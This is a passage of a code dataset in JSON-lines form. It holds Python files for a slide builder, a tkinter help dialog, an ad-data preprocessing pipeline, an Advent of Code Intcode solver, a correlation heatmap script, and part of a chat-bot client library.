false\n.left-column[\n%s\n]\n.right-column[\n%s\n]\n'''\nroot = ''\nprevious = []\n\ndef process(page):\n global root, previous\n lines = page.split('\\n')\n if lines[-1].startswith('\\\\'):\n lines[-1] = FOOTNOTE % lines[-1][1:]\n if lines[0].startswith('/'):\n items = lines[0].split('/')[1:]\n if items[0] != root:\n root = items[0]\n previous = []\n if len(items) > 1:\n previous.append(items[1])\n path = \"### %s\" % root\n for prev in previous[-6:]:\n path += '\\n#### - %s' % prev\n return PAGE % (path, '\\n'.join(lines[1:]))\n else:\n return TITLE % '\\n'.join(lines)\n\n\ndef main(filename):\n with open(filename) as stream:\n text = stream.read().strip()\n pages = [p.strip() for p in text.split('---')]\n processed = [process(p) for p in pages]\n with open('template.html') as stream:\n template = stream.read()\n html = template.replace('', '\\n---\\n'.join(processed))\n with open('index.html', 'w') as stream:\n stream.write(html)\n\n\nif __name__ == '__main__':\n filename = 'readme.md'\n if len(sys.argv) > 1:\n filename = sys.argv[1]\n main(filename)\n\n","repo_name":"GoGang/RetourDExperience","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74100500203","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom ttkthemes import ThemedTk, THEMES\r\nfrom tkinter import messagebox\r\nimport sys\r\nwith open('necessaries/help.txt','r') as helpfile:\r\n lines= helpfile.readlines()\r\n help =''\r\n help = help.join(line for line in lines)\r\ndef helpWin(root,e=None):\r\n infowin = Toplevel(root)\r\n infowin.grab_set()\r\n #infowin.grab_release()\r\n infowin.title('help')\r\n infowin.geometry(\"640x410+255+190\")\r\n infowin.resizable(0,0)\r\n aboutImg = PhotoImage(file='icons/about.png')\r\n conImg = PhotoImage(file='icons/tick.png')\r\n infowin.tk.call('wm', 'iconphoto', infowin._w, 
aboutImg)\r\n    lbl = Label(infowin,text=\"Custom Tkinter DialogBox Example Help Wizard! \",font=('arial',10,'bold','underline')).pack(fill=X,pady=3)\r\n    ###\r\n    f = Frame(infowin)\r\n    f.pack(fill=BOTH,padx=5)\r\n    yscrollbar = Scrollbar(f)\r\n    yscrollbar.pack( side = RIGHT, fill = Y )\r\n    txtbox = Text(f,height=21,yscrollcommand = yscrollbar.set,wrap=WORD)\r\n    txtbox.pack(fill=BOTH,padx=5)\r\n\r\n    txtbox.insert(END,help)\r\n    #\r\n    yscrollbar.config( command = txtbox.yview )\r\n    okBtn = ttk.Button(infowin,text=\" Quit \",image=conImg,compound=LEFT,\r\n                    style='C.TButton',cursor=\"hand2\",command=infowin.destroy)\r\n    okBtn.pack(side=TOP,pady=3)\r\n    ###\r\n    txtbox.config(state=DISABLED)\r\n    infowin.mainloop()\r\n","repo_name":"Manav1918/custom-dialogbox-tkinter","sub_path":"tk theme example/dialogbox.py","file_name":"dialogbox.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73772409964","text":"#!/usr/bin/env python\n# coding=utf-8\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime,timedelta\nimport gc\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\ndef handle_ad_op(ad_static_path,ad_operation_path,ad_op_mid_path):\n    if not os.path.exists(ad_static_path):\n        logging.info(ad_static_path + ' does not exist')\n        return\n    if not os.path.exists(ad_operation_path):\n        logging.info(ad_operation_path + ' does not exist')\n        return\n    if os.path.exists(ad_op_mid_path):\n        logging.info(ad_op_mid_path + ' already exists')\n        return\n    \n    ## static ad\n    static_feature_names = ['ad_id','create_time','ad_acc_id','good_id','good_class','ad_trade_id','ad_size']\n    ad_static_df = pd.read_csv(ad_static_path,delimiter = '\\t',\\\n        parse_dates = ['create_time'],header=None,names = static_feature_names,dtype={'ad_id':int,\"ad_acc_id\": int,\\\n        \"good_id\": str, \"good_class\": str, \"ad_trade_id\": str,'ad_size':str}) \n    \n    logging.info(ad_static_path +' load success')\n\n    ad_static_df['create_datetime'] = pd.to_datetime(ad_static_df['create_time'],unit='s')\n    ad_static_df['create_datetime'] = ad_static_df['create_datetime'].astype(str)\n\n    \n    # operation ad\n    operation_names = ['ad_id','create_update_time','op_type','op_set','op_value']\n\n    ad_op_df = pd.read_csv(ad_operation_path,delimiter = '\\t',header=None,names = operation_names,\\\n        dtype={\"ad_id\": int,'create_update_time':int,\"op_type\": int,\"op_set\": int, \"op_value\": object})\n\n    logging.info(ad_operation_path +' load success')\n    \n    '''\n    Convert create_update_time values that are not 0 into the '2015-04-07 09:43:55' format\n    '''\n    def convert_time(x):\n        x = str(x)\n        return x[0:4] + '-' + x[4:6] + '-' + x[6:8] + ' ' + x[8:10] + ':' + x[10:12] + ':' + x[12:14]\n\n    ad_op_df.loc[ad_op_df['create_update_time'] != 0,'create_update_time']=ad_op_df['create_update_time'].apply(convert_time)\n    \n    '''\n    Many newly created ads have a time of 0, so fill in the time first\n    '''\n    ad_op_df.loc[ad_op_df['create_update_time'] == 0,'create_update_time']=ad_op_df['ad_id'].map(dict(zip(ad_static_df.ad_id,ad_static_df.create_datetime)))\n\n\n    ad_op_df.sort_values(by = ['ad_id','create_update_time'],inplace=True)\n\n    ad_op_df = ad_op_df.reset_index()\n    ad_op_df.drop(columns = ['index'],inplace=True)\n    \n    ad_op_df.to_csv(ad_op_mid_path,sep='\\t',index=False)\n    logging.info(ad_op_mid_path + ' dump success')\n    del ad_static_df\n    del ad_op_df\n    gc.collect()\n    \n    \n    \ndef handle_ad_op_by_line(ad_op_mid_path,ad_op_mid_path2):\n    if not os.path.exists(ad_op_mid_path):\n        logging.info(ad_op_mid_path + ' does not exist')\n        return\n\n    
if os.path.exists(ad_op_mid_path2):\n        logging.info(ad_op_mid_path2 + ' already exists')\n        return\n    \n    \n    '''\n    Next, merge the static and dynamic ad data.\n    The new dataframe needs the following columns:\n    ad_id\n    create_time\n    ad_acc_id\n    good_id\n    good_class\n    ad_trade_id\n    ad_size\n    target_people: target audience\n    deliver_time: delivery time slots\n    ad_bid: bid price\n    valid_time: the time span during which this ad setting is valid, string format 2019-03-09 13:40:03-2019-03-09 14:40:03\n    The unique index is ad_id together with valid_time.\n\n\n    Before merging the dynamic and static data, the dynamic data itself must be consolidated first.\n    The dynamic data columns are:\n    ad_id\n    ad_bid\n    deliver_time\n    target_people\n    valid_time\n    '''\n    \n    ad_op_df = pd.read_csv(ad_op_mid_path,delimiter='\\t')\n    with open(ad_op_mid_path2,'w') as w:\n        w.write('ad_id\\tad_bid\\tdeliver_time\\ttarget_people\\tvalid_time\\n')\n\n        # iterate over the ad operation log data\n        # ad_id\tcreate_update_time\top_type\top_set\top_value\n\n        ad_id = ''\n        ad_bid = None\n        deliver_time = ''\n        target_people = ''\n        valid_start_time = ''\n\n        index = 0\n\n        logging.info('begin handle ad operation data')\n\n        for print_index,row in ad_op_df.iterrows():\n            if print_index % 10000 == 0:\n                logging.info('read %d lines'%print_index)\n            #logging.info(print_index)\n            # if this is a create operation\n            if row['op_type'] == 2:\n                # ad bid\n                if row['op_set'] ==2:\n                    ad_bid = int(row['op_value'])\n                # audience targeting\n                elif row['op_set'] == 3:\n                    target_people = row['op_value']\n                # delivery time slots\n                elif row['op_set'] == 4:\n                    #deliver_time = convertStr2Interval(row['op_value'])\n                    deliver_time = row['op_value']\n                # time\\id\n                valid_start_time = row['create_update_time']\n                ad_id = row['ad_id']\n                continue\n            # if this is a modify operation\n            elif row['op_type'] == 1:\n                # same ad_id as before\n                if row['ad_id'] == ad_id:\n                    # if the bid was modified\n                    if row['op_set'] == 2:\n                        # flush the previous record into the new data\n                        w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n#                     new_op_df.loc[index,'ad_id'] = ad_id\n#                     new_op_df.loc[index,'ad_bid'] = ad_bid\n#                     new_op_df.loc[index,'deliver_time'] = deliver_time\n#                     new_op_df.loc[index,'target_people'] = target_people\n#                     new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n\n                        # reset the validity interval\n                        valid_start_time = row['create_update_time']\n                        ad_bid = int(row['op_value'])\n                        index += 1\n\n                    # if the delivery time slots were modified\n                    if row['op_set'] == 4:\n                        # flush the previous record into the new data\n#                     new_op_df.loc[index,'ad_id'] = ad_id\n#                     new_op_df.loc[index,'ad_bid'] = ad_bid\n#                     new_op_df.loc[index,'deliver_time'] = deliver_time\n#                     new_op_df.loc[index,'target_people'] = target_people\n#                     new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n                        w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n                        # reset the validity interval\n                        valid_start_time = row['create_update_time']\n                        #deliver_time = convertStr2Interval(row['op_value'])\n                        deliver_time = row['op_value']\n                        index += 1\n\n                    # if the audience targeting was modified\n                    if row['op_set'] == 3:\n                        # flush the previous record into the new data\n#                     new_op_df.loc[index,'ad_id'] = ad_id\n#                     new_op_df.loc[index,'ad_bid'] = ad_bid\n#                     new_op_df.loc[index,'deliver_time'] = deliver_time\n#                     new_op_df.loc[index,'target_people'] = target_people\n#                     new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n                        w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n                        # reset the validity interval\n                        valid_start_time = row['create_update_time']\n                        target_people = row['op_value']\n                        index += 1\n\n\n                    # if the ad status was modified\n                    if row['op_set'] == 1:\n                        # if the ad was set to inactive\n                        if row['op_value'] == 
'0':\n#                     new_op_df.loc[index,'ad_id'] = ad_id\n#                     new_op_df.loc[index,'ad_bid'] = ad_bid\n#                     new_op_df.loc[index,'deliver_time'] = deliver_time\n#                     new_op_df.loc[index,'target_people'] = target_people\n#                     new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n                            w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n                            # reset the validity interval\n                            valid_start_time = ''\n                            index += 1\n                        else:\n                            valid_start_time = row['create_update_time']\n    \n        w.flush()\n    logging.info('end handle ad operation data by line')\n    del ad_op_df\n    gc.collect()\n\ndef merge(ad_static_path,ad_op_mid_path,ad_merge_path):\n    if not os.path.exists(ad_static_path):\n        logging.info(ad_static_path + ' does not exist')\n        return\n    if not os.path.exists(ad_op_mid_path):\n        logging.info(ad_op_mid_path + ' does not exist')\n        return\n    if os.path.exists(ad_merge_path):\n        logging.info(ad_merge_path + ' already exists')\n        return\n    \n    ## static ad\n    static_feature_names = ['ad_id','create_time','ad_acc_id','good_id','good_class','ad_trade_id','ad_size']\n    ad_static_df = pd.read_csv(ad_static_path,delimiter = '\\t',\\\n        parse_dates = ['create_time'],header=None,names = static_feature_names,dtype={'ad_id':object,\"ad_acc_id\": int,\\\n        \"good_id\": str, \"good_class\": str, \"ad_trade_id\": str,'ad_size':str}) \n    \n    logging.info(ad_static_path +' load success')\n    \n    \n    new_op_df = pd.read_csv(ad_op_mid_path,delimiter = '\\t')\n    new_op_df['ad_id'] = new_op_df['ad_id'].astype(object)\n    #pd.DataFrame(columns = ['ad_id','ad_bid','deliver_time','target_people','valid_time'])\n    logging.info(ad_op_mid_path +' load success')\n    \n\n    # The processing looks correct, since every ad is a create followed by modifications\n    # Next, handle the time: convert the string into a range\n    #ad_static_df['ad_id'] = ad_static_df['ad_id'].astype(object)\n    # merge this data with the static data\n    new_op_df = new_op_df.merge(ad_static_df,on = 'ad_id',how = 'left')\n    new_op_df.drop(columns = ['create_time'],inplace=True)\n\n    logging.info('merge success')\n    new_op_df.to_csv(ad_merge_path,sep='\\t')\n    logging.info(ad_merge_path + ' dump success')\n    \n    '''\n    This gives the basic data of the ads exposed each day; next we need to build the required information:\n    creation time\n    ad trade id\n    good class\n    good id\n    ad account id\n    delivery time slots\n    audience targeting\n    bid price\n\n    Delivery time slots, audience targeting and bid price are dynamic data and may differ at different times.\n\n    Next we need to determine the concrete values of these dynamic fields at the moment of exposure.\n\n    How to determine them?\n    The dynamic data must be combined with the static data.\n    '''\n\ndef main():\n    ad_static_path = '../data/testA/ad_static_feature.out'\n    ad_operation_path = '../data/testA/ad_operation.dat'\n    ad_op_mid_path = '../data/testA/ad_op_mid.txt'\n    ad_op_mid_path2 = '../data/testA/ad_op_mid2.txt'\n    ad_merge_path = '../data/testA/ad_static_dynamic_merge.csv'\n    \n    handle_ad_op(ad_static_path,ad_operation_path,ad_op_mid_path)\n    handle_ad_op_by_line(ad_op_mid_path,ad_op_mid_path2)\n    merge(ad_static_path,ad_op_mid_path2,ad_merge_path)\n\n\n\n\n# test the time conversion\ndef convertOneStr2Interval(x):\n    x = int(x)\n    bin_str = bin(x)[2:]\n    bin_len = len(bin_str)\n    r_pos = bin_str.rfind('1')\n    if bin_len % 2 == 0:\n        end_date = str(bin_len//2) + ':00'\n    else:\n        end_date = str(bin_len//2) + ':30'\n\n    interval = bin_len - r_pos - 1\n    if interval % 2 == 0:\n        begin_date = str(interval//2) + ':00'\n    else:\n        begin_date = str(interval//2) + ':30'\n    return begin_date + '-' + end_date \n\ndef convertStr2Interval(x):\n    res_str = ''\n    time_list = x.split(',')\n    for time in time_list:\n        res_str += convertOneStr2Interval(time) + ','\n    return res_str[:-1]\n\n    \n    \nif __name__ == '__main__':\n    
main()\n","repo_name":"fengjiaxin/tencent_2019_game","sub_path":"code/process_ad_data.py","file_name":"process_ad_data.py","file_ext":"py","file_size_in_byte":12705,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8705593553","text":"#Day 17\npath = 'aoc2019_day17.txt'\nday17 = dict()\nindex = 0\nwith open(path) as f:\n for l in f:\n for n in l.rstrip().split(','):\n day17[index] = int(n)\n index += 1\n \ndef process_opcode(prog, position, inpt, rel_base):\n inst = str(prog[position]).zfill(5)\n opcode = int(inst[3:])\n param1_mode = int(inst[2])\n param2_mode = int(inst[1])\n param3_mode = int(inst[0])\n stop = 0\n new_pos = None\n outpt = None\n \n def get_value(param, mode, rel_base):\n if mode == 0:\n val_pos = prog.get(position+param, 0)\n val = prog.get(val_pos, 0)\n elif mode == 1:\n val = prog.get(position+param, 0)\n elif mode == 2:\n val_pos = rel_base + prog.get(position+param, 0)\n val = prog.get(val_pos, 0)\n #print('Value '+str(param)+', mode '+str(mode)+' = '+str(val))\n return val\n \n def find_output_pos(param, mode, rel_base):\n if mode == 0:\n out_pos = prog.get(position+param, 0)\n elif mode == 2:\n out_pos = rel_base + prog.get(position+param, 0)\n #print('Value '+str(param)+', mode '+str(mode)+', output position = '+str(out_pos))\n return out_pos\n \n if opcode == 1:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n prog[output_pos] = val1 + val2\n new_pos = position+4\n #print('Opcode 1 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', '+str(val1)+' + '+str(val2)+' = '+str(val1 + val2)+', saved at position '+str(output_pos))\n \n elif opcode == 2:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n prog[output_pos] = val1 * val2\n new_pos = position+4\n #print('Opcode 2 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', '+str(val1)+' * '+str(val2)+' = '+str(val1 * val2)+', saved at position '+str(output_pos))\n \n elif opcode == 3:\n output_pos = find_output_pos(1, param1_mode, rel_base)\n prog[output_pos] = inpt\n new_pos = position+2\n #print('Opcode 3 '+str(inst)+','+str(prog[position+1])+', input '+str(inpt)+' saved at position '+str(output_pos))\n \n elif opcode == 4:\n outpt = get_value(1, param1_mode, rel_base)\n new_pos = position+2\n #print('Opcode 4 '+str(inst)+','+str(prog[position+1])+', output = '+str(outpt))\n \n elif opcode == 5:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n if val1 != 0: new_pos = val2\n else: new_pos = position+3\n #print('Opcode 5 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+', val1 = '+str(val1)+', jumping to position '+str(new_pos))\n \n elif opcode == 6:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n if val1 == 0: new_pos = val2\n else: new_pos = position+3\n #print('Opcode 6 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+', val1 = '+str(val1)+', jumping to position '+str(new_pos))\n \n elif opcode == 7:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n if val1 < val2: \n prog[output_pos] = 1\n #print('Opcode 7 
'+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 1 saved at position '+str(output_pos))\n else: \n prog[output_pos] = 0\n #print('Opcode 7 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 0 saved at position '+str(output_pos))\n new_pos = position+4\n \n elif opcode == 8:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n if val1 == val2: \n prog[output_pos] = 1\n #print('Opcode 8 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 1 saved at position '+str(output_pos))\n else: \n prog[output_pos] = 0\n #print('Opcode 8 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 0 saved at position '+str(output_pos))\n new_pos = position+4\n \n elif opcode == 9:\n val1 = get_value(1, param1_mode, rel_base)\n rel_base = rel_base + val1\n new_pos = position+2\n #print('Opcode 9 '+str(inst)+','+str(prog[position+1])+', relative base = '+str(rel_base))\n \n elif opcode == 99:\n stop = 1\n #print('Opcode 99 '+str(inst))\n \n return stop, new_pos, outpt, rel_base\n\ndef run_part1(prog,panels):\n pos = 0\n rel_base = 0\n stop = 0\n inpt = None\n view = ''\n x = 0\n y = 0\n \n while True:\n stop, pos, outpt, rel_base = process_opcode(prog, pos, inpt, rel_base)\n \n if outpt != None:\n view = view + chr(outpt)\n if stop == 1: \n print(view)\n break\n \n for c in view:\n panels[(x,y)] = dict()\n panels[(x,y)]['char'] = c\n panels[(x,y)]['type'] = None\n panels[(x,y)]['visited'] = 0\n x += 1\n if c == '\\n': \n y += 1\n x = 0\n \n return panels\n\nday17_copy = day17.copy()\npanels = dict()\npanels = run_part1(day17_copy,panels)\n\npart1_sum = 0\nrobot_coords = None\nrobot_dir = None\nfor panel in panels:\n x = panel[0]\n y = panel[1]\n north = 0\n south = 0\n east = 0\n west = 0\n if (x,y-1) in panels and panels[(x,y-1)]['char'] in ['^', 'v', '<', '>', '#']: north = 1\n if (x,y+1) in panels and panels[(x,y+1)]['char'] in ['^', 'v', '<', '>', '#']: south = 1\n if (x+1,y) in panels and panels[(x+1,y)]['char'] in ['^', 'v', '<', '>', '#']: east = 1\n if (x-1,y) in panels and panels[(x-1,y)]['char'] in ['^', 'v', '<', '>', '#']: west = 1\n panels[panel]['north'] = north\n panels[panel]['south'] = south\n panels[panel]['east'] = east\n panels[panel]['west'] = west\n \n if panels[panel]['char'] in ['^', 'v', '<', '>']:\n panels[panel]['type'] = 'start'\n robot_coords = panel\n if panels[panel]['char'] == '^': robot_dir = 'N'\n elif panels[panel]['char'] == 'v': robot_dir = 'S'\n elif panels[panel]['char'] == '<': robot_dir = 'W'\n elif panels[panel]['char'] == '>': robot_dir = 'E'\n elif panels[panel]['char'] == '#' and north == 1 and south == 1 and east == 1 and west == 1:\n part1_sum += x*y\n panels[panel]['type'] = 'intersection'\n elif panels[panel]['char'] == '#' and ((north == 1 and south == 1) or (east == 1 and west == 1)):\n panels[panel]['type'] = 'straight'\n elif panels[panel]['char'] == '#' and ((north == 1 and (east == 1 or west == 1)) or (south == 1 and (east == 1 or west == 1))):\n panels[panel]['type'] = 'elbow'\n elif panels[panel]['char'] == '#' and (north == 1 or south == 1 or east == 1 or west == 1):\n panels[panel]['type'] = 'end'\n \nprint('Part 1:',part1_sum)\n\ndef determine_dir(panels,robot_coords,robot_dir):\n turn = ''\n if robot_dir == 'N' and panels[robot_coords]['north'] == 0:\n if panels[robot_coords]['east'] == 1:\n 
robot_dir = 'E'\n turn = 'R,'\n elif panels[robot_coords]['west'] == 1:\n robot_dir = 'W'\n turn = 'L,'\n elif robot_dir == 'S' and panels[robot_coords]['south'] == 0:\n if panels[robot_coords]['east'] == 1:\n robot_dir = 'E'\n turn = 'L,'\n elif panels[robot_coords]['west'] == 1:\n robot_dir = 'W'\n turn = 'R,'\n elif robot_dir == 'W' and panels[robot_coords]['west'] == 0:\n if panels[robot_coords]['north'] == 1:\n robot_dir = 'N'\n turn = 'R,'\n elif panels[robot_coords]['south'] == 1:\n robot_dir = 'S'\n turn = 'L,'\n elif robot_dir == 'E' and panels[robot_coords]['east'] == 0:\n if panels[robot_coords]['north'] == 1:\n robot_dir = 'N'\n turn = 'L,'\n elif panels[robot_coords]['south'] == 1:\n robot_dir = 'S'\n turn = 'R,'\n return robot_dir, turn\n\ndef move_robot(robot_coords,robot_dir):\n x = robot_coords[0]\n y = robot_coords[1]\n if robot_dir == 'N': y -= 1\n elif robot_dir == 'S': y += 1\n elif robot_dir == 'E': x += 1\n elif robot_dir == 'W': x -= 1\n robot_coords = (x,y)\n return robot_coords\n\n#Trying to find a viable path, only turning at elbows for now\npath = ''\nmoves = 0\nwhile True:\n panels[robot_coords]['visited'] = 1\n if panels[robot_coords]['type'] == 'end':\n path += str(moves)\n print('Reached end!')\n print(path)\n break\n elif panels[robot_coords]['type'] == 'start':\n robot_dir, turn = determine_dir(panels,robot_coords,robot_dir)\n path += turn\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n elif panels[robot_coords]['type'] in ['straight', 'intersection']:\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n elif panels[robot_coords]['type'] == 'elbow':\n path += str(moves)+','\n moves = 0\n robot_dir, turn = determine_dir(panels,robot_coords,robot_dir)\n path += turn\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n\n#check that all scaffold panels were visited:\nmissed = 0\nfor panel in panels:\n if panels[panel]['char'] == '#' and panels[panel]['visited'] == 0:\n missed += 1\nprint('Scaffold panels missed:',missed)\n\n#manually determined function patterns\nmain_str = 'A,A,B,B,C,B,C,B,C,A\\n'\nmain_ascii = list()\nfor c in main_str:\n main_ascii.append(ord(c))\na_str = 'L,10,L,10,R,6\\n'\na_ascii = list()\nfor c in a_str:\n a_ascii.append(ord(c))\nb_str = 'R,12,L,12,L,12\\n'\nb_ascii = list()\nfor c in b_str:\n b_ascii.append(ord(c))\nc_str = 'L,6,L,10,R,12,R,12\\n'\nc_ascii = list()\nfor c in c_str:\n c_ascii.append(ord(c))\nvideo_str = 'n\\n'\nvideo_ascii = list()\nfor c in video_str:\n video_ascii.append(ord(c))\ninputs = main_ascii + a_ascii + b_ascii + c_ascii + video_ascii\n\ndef run_part2(prog,inputs):\n pos = 0\n rel_base = 0\n stop = 0\n inpt = None\n input_count = 0\n \n while True:\n if str(prog[pos])[-1] == '3':\n inpt = inputs[input_count]\n input_count += 1\n stop, pos, outpt, rel_base = process_opcode(prog, pos, inpt, rel_base)\n \n if outpt != None:\n final_output = outpt\n if stop == 1:\n break\n \n return final_output\n\n\nday17_copy = day17.copy()\n#Force the vacuum robot to wake up by changing the value in your ASCII program at address 0 from 1 to 2\nday17_copy[0] = 2\npart2 = run_part2(day17_copy,inputs)\nprint('Part 2:',part2)","repo_name":"a-m-edwards/adventofcode","sub_path":"aoc2019_day17.py","file_name":"aoc2019_day17.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13664360998","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as 
plt\n\ndata = pd.read_csv('processedDataForVisual.csv')\n\ndata = data.iloc[:,1:]\n\ndata_corr = data.corr()\nplt.figure(figsize=(25,25),dpi=200)\nplt.rcParams['font.sans-serif'] = ['SimHei'] # set the Chinese font to SimHei\nplt.rcParams['axes.unicode_minus'] = False # fix the minus sign '-' rendering as a box in saved figures\nsns.set(font='SimHei',font_scale=1.5)  # fix Chinese text rendering in Seaborn and adjust the font size\n\n# use a mask to hide the upper triangle\nmask = np.zeros_like(data_corr, dtype=np.bool)\nmask[np.triu_indices_from(mask)] = True\n\nsns.heatmap(data_corr,\n            mask=mask,\n            annot=True,\n            vmax=1,\n            square=True,\n            cmap=\"Greens\")\nplt.savefig('./correlation.png')\nplt.show()","repo_name":"bit704/Information-System-of-Second-hand-House","sub_path":"数据预处理/爬虫/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40131943666","text":"import asyncio\nimport inspect\nimport logging\nfrom typing import Dict, List, Callable, Coroutine, Union, IO\n\nfrom . import api\nfrom .channel import public_channel_factory, PublicChannel, Channel\nfrom .game import Game\nfrom .gateway import Gateway, Requestable\nfrom .guild import Guild\nfrom .interface import AsyncRunnable, MessageTypes\nfrom .message import RawMessage, Event, PublicMessage, PrivateMessage\nfrom .user import User\n\nlog = logging.getLogger(__name__)\n\nTypeHandler = Callable[[Union['Message', 'Event']], Coroutine]\n\n\nclass Client(Requestable, AsyncRunnable):\n    \"\"\"\n    The bridge between khl.py internal components and khl server.\n\n    Translates network package into khl.py concepts/object for internal to use.\n\n    reminder: Client.loop only used to run handle_event() and registered handlers.\n    \"\"\"\n    _handler_map: Dict[MessageTypes, List[TypeHandler]]\n\n    def __init__(self, gate: Gateway):\n        self.gate = gate\n        self.ignore_self_msg = True\n        self._me = None\n\n        self._handler_map = {}\n        self._pkg_queue = asyncio.Queue()\n\n    def register(self, type: MessageTypes, handler: TypeHandler):\n        if not asyncio.iscoroutinefunction(handler):\n            raise TypeError('handler must be a coroutine.')\n\n        params = list(inspect.signature(handler).parameters.values())\n        if len(params) != 1 or not issubclass(params[0].annotation, RawMessage):\n            raise TypeError('handler must have one and only one param, and the param inherits RawMessage')\n\n        if type not in self._handler_map:\n            self._handler_map[type] = []\n        self._handler_map[type].append(handler)\n\n    async def handle_pkg(self):\n        \"\"\"\n        consume `pkg` from `event_queue`\n        \"\"\"\n        while True:\n            pkg: Dict = await self._pkg_queue.get()\n            log.debug(f'upcoming pkg: {pkg}')\n\n            try:\n                await self._consume_pkg(pkg)\n            except Exception as e:\n                log.exception(e)\n\n            self._pkg_queue.task_done()\n\n    async def _consume_pkg(self, pkg: Dict):\n        \"\"\"\n        spawn `msg` according to `pkg`,\n        check if ignore msgs from self\n        pass `msg` to corresponding handlers defined in `_handler_map`\n        \"\"\"\n        msg = self._make_msg(pkg)\n        if self.ignore_self_msg and msg.type != MessageTypes.SYS:\n            if msg.author.id == (await self.fetch_me()).id:\n                return\n        self._dispatch_msg(msg)\n\n    def _make_msg(self, pkg: Dict):\n        if pkg.get('type') == MessageTypes.SYS.value:\n            msg = Event(**pkg)\n        else:\n            msg = self._make_channel_msg(pkg)\n        return msg\n\n    def _make_channel_msg(self, pkg):\n        msg = None\n        channel_type = pkg.get('channel_type')\n        if channel_type == 'GROUP':\n            msg = PublicMessage(**pkg, _gate_=self.gate)\n        elif channel_type == 'PERSON':\n            msg = PrivateMessage(**pkg, _gate_=self.gate)\n        else:\n            log.error(f'can 
not make msg from pkg: {pkg}')\n return msg\n\n def _dispatch_msg(self, msg):\n if not msg:\n return\n if msg.type in self._handler_map and self._handler_map[msg.type]:\n for handler in self._handler_map[msg.type]:\n asyncio.ensure_future(self._handle_safe(handler)(msg), loop=self.loop)\n\n @staticmethod\n def _handle_safe(handler: TypeHandler):\n\n async def safe_handler(msg):\n try:\n await handler(msg)\n except Exception as e:\n log.exception(f'error raised during message handling', exc_info=e)\n\n return safe_handler\n\n async def create_asset(self, file: Union[IO, str]) -> str:\n \"\"\"upload ``file`` to khl, and return the url to the file\n\n if ``file`` is a str, ``open(file, 'rb')`` will be called to convert it into IO\n \"\"\"\n file = open(file, 'rb') if isinstance(file, str) else file\n return (await self.gate.exec_req(api.Asset.create(file=file)))['url']\n\n async def fetch_me(self, force_update: bool = False) -> User:\n \"\"\"fetch detail of the ``User`` on the client\"\"\"\n if force_update or not self._me or not self._me.is_loaded():\n self._me = User(_gate_=self.gate, _lazy_loaded_=True, **(await self.gate.exec_req(api.User.me())))\n return self._me\n\n @property\n def me(self) -> User:\n \"\"\"\n get client itself corresponding User\n\n RECOMMEND: use ``await fetch_me()``\n\n CAUTION: please call ``await fetch_me()`` first to load data from khl server\n\n designed as 'empty-then-fetch' will break the rule 'net-related is async'\n\n :return: the client's underlying User\n \"\"\"\n if self._me and self._me.is_loaded():\n return self._me\n raise ValueError('not loaded, please call `await fetch_me()` first')\n\n async def fetch_public_channel(self, channel_id: str) -> PublicChannel:\n \"\"\"fetch details of a public channel from khl\"\"\"\n channel_data = await self.gate.exec_req(api.Channel.view(channel_id))\n return 